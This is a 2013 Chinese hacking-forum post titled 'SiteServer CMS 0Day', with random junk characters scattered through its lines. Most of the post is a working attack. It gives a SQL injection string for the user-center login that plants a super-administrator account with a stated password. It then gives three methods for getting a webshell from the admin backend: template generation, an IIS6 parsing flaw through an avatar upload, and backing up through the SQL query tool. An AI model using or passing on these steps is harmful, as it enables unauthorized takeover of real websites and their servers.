找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2337|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版3 ]; T& n, h  F) H4 Q+ j; v  z

* x. I) h" H6 b1 Dstieserver官网:www.siteserver.cn
) S! H9 B% K; g' V, f3 W7 |; m( E' b1 L9 s% J4 ^) {8 ~  ]) y

% }+ d* E% Y0 S9 {; O3 Q6 o2 `# n: ]* P& F8 @# y0 ~% a
EXP:  i) ^% c, ?' f5 ?6 c' f4 u4 e' p) `

2 t4 Q) W/ _) \" |2 z9 M$ N: D直接访问UserCenter/login.aspx
3 S) v& b2 w% |" x  D" q" g/ I7 U: f1 a( F0 u4 h# K1 {7 [) q7 ?
2 ^% B% D6 b! J% p9 h9 Q. {

  c  m6 N+ m1 d0 R9 a* H/ _用户名处输入:
) [0 J7 q5 a! ?+ ~
, L4 L, c: o1 v, U" D123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
' x1 a* i9 a( |( P9 y4 ^5 f) d  n$ y! Q+ `  O

1 ^7 {! W9 {% y; Z9 ?9 ^
7 K! N/ R$ u- U3 p" e5 }  I密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
8 @2 J' \" q3 K6 w" i# z# i# \0 X8 o6 F7 \5 ^

9 Z% e1 k7 H- D( L6 D8 }2 L4 {2 [. G
之后再访问后台SiteServer/login.aspx用插入的用户登陆: j% A( J9 A7 I. t# N% o. y
! y( {: I0 K: D; a2 `1 y2 Q1 w

# o# A$ J/ a/ x- N
- w  }4 Q; S6 A6 ?后台拿webshell的三种方法:6 l3 G2 @) a7 i2 h/ b; X; E. U! X: n
4 E  f' F% \- }
一、# V/ _; x: z) K, }

0 f6 Y0 L: `  P4 p2 q+ f. u5 s! @站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 t8 |( @: @7 V1 T6 O3 a1 B) ~+ O" ]  Z( I! }9 t7 W
二、2 t+ B+ Q- L* S/ s; L3 ]" @- k

5 T( A+ w9 ]0 t5 B# y. ~( T成员权限-》添加用户-》用户名为:1.asp
8 [. @, H7 U) [' Z- w7 k4 q3 Z6 s$ W8 r# D$ e8 N5 B( F
http://127.0.0.1/usercenter/$ A' K% c& Z4 ~5 C5 f% L( z, I" z

# N# {9 Q$ ~; F; I8 x用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
+ a- j: [/ r1 l( j% F: I% J; C7 R5 q3 I" P
(ps:后台添加用户时不会验证是否含有非法字符)! {6 _1 M  I% Z. m8 G% V

8 @/ O0 Y% d) O6 ]  m% v5 J5 `  T三、
, r8 n/ R7 l6 G+ z
/ ?) [+ U$ P" S5 O4 F  \& ~系统工具-》实用工具-》机器参数查看
/ U' w1 E/ G  ^% w可以看到数据库类型、名称,WEB路径0 V8 ?6 ?5 O4 e- t/ v/ k9 a
& i& ^7 Z& I0 Z) j
系统工具-》数据库工具-》SQL语句查询
: N/ Q! R% K5 p( h- ?) S6 X( g这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。2 X, M8 Y. C) s1 u( e0 C( {

2 K% q; L9 `3 x% p+ E. N) \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表